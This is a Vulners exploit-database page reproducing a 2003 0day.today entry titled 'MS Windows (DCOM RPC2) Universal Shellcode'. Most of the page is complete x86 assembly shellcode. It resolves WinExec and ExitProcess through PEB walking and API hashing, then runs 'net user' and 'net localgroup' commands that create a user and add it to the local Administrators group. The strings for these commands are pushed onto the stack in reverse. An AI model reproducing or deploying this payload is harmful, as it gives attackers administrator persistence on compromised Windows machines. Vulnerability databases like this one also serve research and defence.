Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

MS Windows (DCOM RPC2) Universal Shellcode

🗓️ 09 Oct 2003 00:00:00Reported by n/aType 
zdt
 zdt🔗 0day.today👁 18 Views

MS Windows DCOM RPC2 shellcode performs various functions including process execution and exit handling.

Code
==========================================
MS Windows (DCOM RPC2) Universal Shellcode 
==========================================





; Segment type:	Pure code
;seg000		segment	byte public 'CODE' use32
;		assume cs:seg000
;		assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
.386
assume cs:seg000
var_29C		= byte ptr -29Ch
var_28C		= byte ptr -28Ch
var_25F		= byte ptr -25Fh
var_254		= dword	ptr -254h
var_250		= dword	ptr -250h
var_24C		= dword	ptr -24Ch

seg000		segment	byte public 'CODE' use32

beginofpackeddata:			; CODE XREF: UnXORFunc+17j
		push	ebp
		mov	ebp, esp
		sub	esp, 80h
		mov	esi, esp
		call	sub_191
		push eax
		mov	eax, fs:18h
		mov	eax, [eax+30h]
		lea	eax, [eax+18h]
		mov	ebx, 190000h
		mov	[eax], ebx
		pop  eax
		mov	[esi], eax
		push	dword ptr [esi]
		push	0E8AFE98h
		call	GetFunctionBYName ;WinExec
		mov	[esi+0Ch], eax
		push	dword ptr [esi]
		push 	73e2d87eh		
		call	GetFunctionBYName ;ExitProcess
		mov	[esi+10h], eax

		xor	eax, eax
		push	eax
		push	'd'
		push	'da/ '
		push	'a a '
		push	'resu'
		push	' ten'
		mov	ecx, esp
		push	eax
		push	ecx
		call	dword ptr [esi+0Ch]

		xor	eax, eax
		push	eax
		push	'd'
		push	'da/ '
		push	'a ?'
		push	'????'
		push	'????'
		push	'????'
		push	'? pu'
		push	'orgl'
		push	'acol'
		push	' ten'
		mov	ecx, esp
		push	eax
		push	ecx
		call	dword ptr [esi+0Ch]

		xor	eax, eax
		push	eax
		push	'd'
		push	'da/ '
		push	'a ?'
		push	'?? '
		push	'???'
		push	'????'
		push	'? pu'
		push	'orgl'
		push	'acol'
		push	' ten'
		mov	ecx, esp
		push	eax
		push	ecx
		call	dword ptr [esi+0Ch]
				
		xor	eax, eax
		push	eax
		push	'd'
		push	'da/ '
		push	'a s'
		push	'rota'
		push	'rtsi'
		push	'nimd'
		push	'A pu'
		push	'orgl'
		push	'acol'
		push	' ten'
		mov	ecx, esp
		push	eax
		push	ecx
		call	dword ptr [esi+0Ch]

		push	0h
		call	dword ptr [esi+10h] ;
;		end

; ??????????????? S U B	R O U T	I N E ???????????????????????????????????????


GetFunctionBYName proc near		; CODE XREF: UnXORFunc+31p
					; UnXORFunc+40p ...

arg_0		= dword	ptr  14h
arg_4		= dword	ptr  18h

		push	ebx
		push	ebp
		push	esi
		push	edi
		mov	ebp, [esp+arg_4]
		mov	eax, [ebp+3Ch]
		mov	edx, [ebp+eax+78h]
		add	edx, ebp
		mov	ecx, [edx+18h]
		mov	ebx, [edx+20h]
		add	ebx, ebp

loc_1B2:				; CODE XREF: GetFunctionBYName+36j
		jecxz	short loc_1E6
		dec	ecx
		mov	esi, [ebx+ecx*4]
		add	esi, ebp
		xor	edi, edi
		cld

loc_1BD:				; CODE XREF: GetFunctionBYName+30j
		xor	eax, eax
		lodsb
		cmp	al, ah
		jz	short loc_1CB
		ror	edi, 0Dh
		add	edi, eax
		jmp	short loc_1BD
; ???????????????????????????????????????????????????????????????????????????

loc_1CB:				; CODE XREF: GetFunctionBYName+29j
		cmp	edi, [esp+arg_0]
		jnz	short loc_1B2
		mov	ebx, [edx+24h]
		add	ebx, ebp
		mov	cx, [ebx+ecx*2]
		mov	ebx, [edx+1Ch]
		add	ebx, ebp
		mov	eax, [ebx+ecx*4]
		add	eax, ebp
		jmp	short loc_1E8
; ???????????????????????????????????????????????????????????????????????????

loc_1E6:				; CODE XREF: GetFunctionBYName+19j
		xor	eax, eax

loc_1E8:				; CODE XREF: GetFunctionBYName+4Bj
		mov	edx, ebp
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn	4
GetFunctionBYName endp

sub_191		proc near		; CODE XREF: sub_76+Bp
		push	ebp
		push	esi
		mov	eax, fs:30h
		test	eax, eax
		js	short loc_1A9
		mov	eax, [eax+0Ch]
		mov	esi, [eax+1Ch]
		lodsd
		mov	ebp, [eax+8]
		jmp	short loc_1B2
; ???????????????????????????????????????????????????????????????????????????

loc_1A9:				; CODE XREF: sub_191+Aj
		mov	eax, [eax+34h]
		mov	ebp, [eax+0B8h]

loc_1B2:				; CODE XREF: sub_191+16j
		mov	eax, ebp
		pop	esi
		pop	ebp
		retn	4
sub_191 endp
; ???????????????????????????????????????????????????????????????????????????

seg000		ends

end

; 

#  0day.today [2018-01-06]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Oct 2003 00:00Current
7High risk
Vulners AI Score7
ms windowsdcomrpc2shellcodeprocess executionexit handling.
18